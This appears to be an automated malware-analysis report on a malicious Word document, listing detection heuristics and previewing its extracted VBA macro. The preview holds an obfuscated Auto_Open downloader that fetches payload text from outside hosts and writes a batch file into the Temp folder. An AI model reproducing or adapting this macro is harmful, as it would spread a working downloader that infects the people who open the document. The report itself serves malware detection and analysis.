MALICIOUS
470
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. Critical heuristics indicate the use of the Shell() function and obfuscation techniques, strongly suggesting the execution of a secondary payload. The Auto_Open macro is present, which is a common technique for executing malicious code upon document opening. The script attempts to construct a path for a temporary file and a URL, indicating a downloader functionality.
Heuristics 13
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA macros detected medium 9 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 36502 bytes |
SHA-256: 8474872e35a014b78a5cba427c9fad3ec0c67e2dc319118085d50969e9f1de95 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub VYUQGWDhsagdasd_Open()
End Sub
Sub Auto_Open()
Yhuqwdnwqjndqb
End Sub
Sub Bubwdhqbjhjabsd()
NUQDNUWQHDWQU = "qihwdjkqwhejkw qhe jkqwh ejkqhw e"
End Sub
Sub Yhuqwdnwqjndqb()
Dim asjiw As Integer, jwasssssdas As Integer, mmmilikeit As Integer, asdsssssjqwdq As Integer
Dim huwe, auwd As Integer, aabbb As Integer
Dim retVal As Variant
Dim HPPSDJ As String
YUGQYD = FRB.Ubqhwdhwqbd(16735)
FL2 = YUGQYD
HPPSDJ = "" + "" & "Te" + "mp" & ""
PH2 = FRB.Bad(HPPSDJ) + "\"
mmmilikeit = CInt(YUGQYD)
jwnqdw = 1 - mmmilikeit
JIQWDJQ = 12312312
JIQWDJQ = 1 + 1 + 113 + Sgn(jwnqdw)
AAAA = JIQWDJQ
HYWDAX = "bauwdhquwgdyquwdyuqwgd sjahdg ahsjdgat"
JWIDJIAAA = ""
HUYFEA = "uwdhqwiduihqwd"
QIWJDABB = "b"
HUYFEA = QIWJDABB + "a" + "t"
IUQJWD = "qwljdlwqk"
PSFL = FL2 + "" & "." + "p" + "" + Chr(115) _
+ _
"1"
'+ Right(HYWDAX, 1)
SSS = Chr(AAAA + 1)
VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
huwe = 1
BAFL = FL2 + Chr(Sgn(Fix(-22.043)) + 11 + 10 + 25 + huwe + 0) + HUYFEA
INTG = "" & "o" & "bject"
KIWD = Chr(110 + Sgn(Len(BAFL))) + "d" + "" + "ul" + "e"
AFTG = "m" & KIWD
SXEE = Chr(46)
SXAA = Chr(101)
SXE = SXEE & SXAA & "xe"
GNG = ".png"
PHT = "" & "ht" & "t" & "p://" & ""
SPIC = "" & "" & "s" + "" & "av" & "epi" + "c.su" + Chr(47)
PSPTH = PH2 + PSFL
VBPTH = PH2 + VBFL
BAPTH = "bauqwhduiq hwgdhj dvbnsavd uqywgdq jwhdgwqd"
ABPTH = PH2 + BAFL
BAPTH = ABPTH
Dim AAAAHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer
DRT = 315
BFT = 316
CFT = 317
DFT = 318
EFT = 319
Dim PBIn As String, asdwq As String, MIWDWQ As String
CDDD = "89172387.txt"
LNSS = "lns.txt"
STT1 = "dolphin2000.ir/tmp/"
STT2 = "gnf.jotpee.de/tmp/"
PBIn = PHT + STT1 + CDDD
CONT = FRB.Kace(PBIn)
asdwq = CONT
HQUWDAAA = "0"
If (asdwq = "") Then
PBIn = PHT + STT2 + CDDD
CONT = FRB.Kace(PBIn)
asdwq = CONT
HQUWDAAA = "1"
End If
CONT = FRB.Quqhwdbyas(asdwq)
TVT10 = FRB.Port(CONT, "text10")
TVT20 = FRB.Port(CONT, "text20")
TVT21 = FRB.Port(CONT, "text21")
TVT30 = FRB.Port(CONT, "text30")
TVT31 = FRB.Port(CONT, "text31")
XPT1 = FRB.Port(CONT, "stext1")
XPT2 = FRB.Port(CONT, "stext2")
XPT3 = FRB.Port(CONT, "stext3")
WVR = FRB.Bad("USE" & "RPROFILE")
UQHWDIHQW = "qwhdjkqwhdq dnasbdjnsbd kanm djkshdk"
hufehu1 = InStr(WVR, "sers\")
Dim hudhw As Integer
Dim ghdAdd(1 To 3)
ghdAdd(1) = "1"
ghdAdd(2) = "0"
ghdAdd(3) = "0"
If (hufehu1 <> 0) Then
ghdAdd(1) = "2"
Else
ghdAdd(2) = "3"
End If
JHWQUD = Join(ghdAdd)
hudhw = Val(JHWQUD)
FRB.WaitFor (1)
MIWDWQ = PHT + STT1 + LNSS
If (HQUWDAAA = "1") Then
MIWDWQ = PHT + STT2 + LNSS
End If
SEXX = FRB.Kace(MIWDWQ)
PSTB = PBIn + "123123123"
MSTAR1 = SPIC + "7232078" + GNG
MSTAR2 = SPIC + "7230030" + GNG
STAR1 = PHT + MSTAR1
STAR2 = PHT + MSTAR2
FFQ = "8"
FF = FFQ + SXE
If (hudhw = 130) Then
Open BAPTH For Output As #DRT
Print #DRT, XPT1
Print #DRT, ":rtqdftqwfdhwgqf" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
Print #DRT, XPT2
Close #DRT
FRB.WaitFor
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.